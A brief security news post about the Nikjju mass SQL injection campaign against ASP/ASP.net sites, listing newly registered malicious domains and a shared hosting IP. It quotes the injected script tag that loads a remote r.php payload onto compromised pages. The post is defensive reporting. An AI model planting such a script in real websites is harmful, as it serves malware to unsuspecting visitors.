Uhjiku. com Injection: Nikjju SQL Injection attack



CyberCrimals behind the Nikjju Mass injection attack, continue their SQL injection attack against ASP/ASP.net websites.  Last month, Sucuri reported that more than 180,000 websites compromised.

Hackers compromised vulnerable sites by injection the following malicious script:
    <script src=[Malware_Domain]/r.php ></script>

It seems like hackers registering new domains every week for this attack.  Recently, F-Secure discovered a new domain 'njukol[dot]com'.  The domain is registered on April 28 .

While analyzing one of the compromised websites, i found that there is new fresh domain has been used in this attack, 'Uhjiku[dot]com/r.php'. The Uhjiku is registered on May 5,2012(Yesterday).

The list of Malicious Domains:
  • Nikjju.com
  • hgbyju.com
  • njukol.com
  • Uhjiku.com
All domains are hosted at 31.210.100.242 and has same registrant details.


Category: / /

Share this with Your friends: